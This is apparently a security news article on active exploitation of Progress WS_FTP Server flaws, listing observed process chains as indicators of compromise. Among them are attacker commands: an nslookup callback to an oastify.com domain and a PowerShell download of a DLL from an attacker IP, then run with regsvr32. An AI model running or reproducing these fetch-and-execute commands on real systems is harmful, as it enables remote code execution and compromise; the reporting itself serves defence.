Exploitation of Critical WS_FTP Server Flaw Spotted in the Wild

As previously reported, Progress-owned WS_FTP was discovered with multiple vulnerabilities associated with cross-site scripting (XSS), SQL injection, cross-site request forgery, unauthenticated user enumeration, and a few others.

Progress has warned their users about the WS_FTP vulnerabilities and released a security advisory mentioning the fixed version of the WS_FTP server. Additionally, they have also requested their users to upgrade to the latest version.

Vulnerabilities Exploited in the Wild

According to the reports shared with Cyber Security News, these vulnerabilities were discovered to be exploited by threat actors in the wild. On investigating further, the exploit chain of execution was found to be the same across all the observed instances.

FREE Demo

Deploy Advanced AI-Powered Email Security Solution

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

Free Demo

It was also mentioned that this could mean that there has been a mass exploitation of the vulnerable WS_FTP servers. The collected logs also consisted of one particular burp suite domain on all the recorded incidents which means that a single threat actor is doing the mass exploitation.

However, all the execution chain of commands has been listed below.

Great-grandparent Process:

C:\Windows\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipm18823d36-4194-409a-805b-cea0f4389a0c -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0

Grandparent Process:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe” /noconfig /fullpaths @”C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\aht\e514712b\a2ab2de1\ryvjavth.cmdline

Parent Process:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 “/OUT:C:\Windows\TEMP\RES6C8F.tmp” “c:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\aht\e514712b\a2ab2de1\CSCCEF3EFC08A254FF1848B4D8FBBA6D0CE.TMP

Child Process:

C:\Windows\System32\cmd.exe” /c cmd.exe /C nslookup 2adc9m0bc70noboyvgt357r5gwmnady2.oastify.com

As per the reports, the Attack chain had the below command executions.

Great-grandparent Process:

C:\WINDOWS\SysWOW64\inetsrv\w3wp.exe -ap “WSFTPSVR_WTM” -v “v4.0” -l “webengine4.dll” -a \\.\pipe\iisipme6a8a618-bb7f-470c-92e9-58204f6ffcfa -h “C:\inetpub\temp\apppools\WSFTPSVR_WTM\WSFTPSVR_WTM.config” -w “” -m 1 -t 20 -ta 0

Grandparent Process:

C:\Windows\System32\cmd.exe” /c powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll

Parent Process:

powershell /c “IWR http://172.245.213[.]135:3389/bcrypt -OutFile c:\users\public\NTUSER.dll

Child Process:

C:\Windows\System32\cmd.exe” /c regsvr32 c:\users\public\NTUSER.dll

Furthermore, a complete report has been published by Rapid7, which provides detailed information about the recorded incidents, mitigations, and other information.

“We have responsibly disclosed these vulnerabilities in conjunction with the researchers at Assetnote and have released a fix for each. Currently, we have not seen any indication that these vulnerabilities were exploited before we released the patch. Progress encourages our customers to upgrade to our software’s patched version as soon as possible. Security is of the utmost importance to us, and leveraging development best-practices to minimize product vulnerabilities is an integral part of our security program,” Statement from Progress Spokesperson.

Protect yourself from vulnerabilities using Patch Manager Plus to quickly patch over 850 third-party applications. Take advantage of the free trial to ensure 100% security.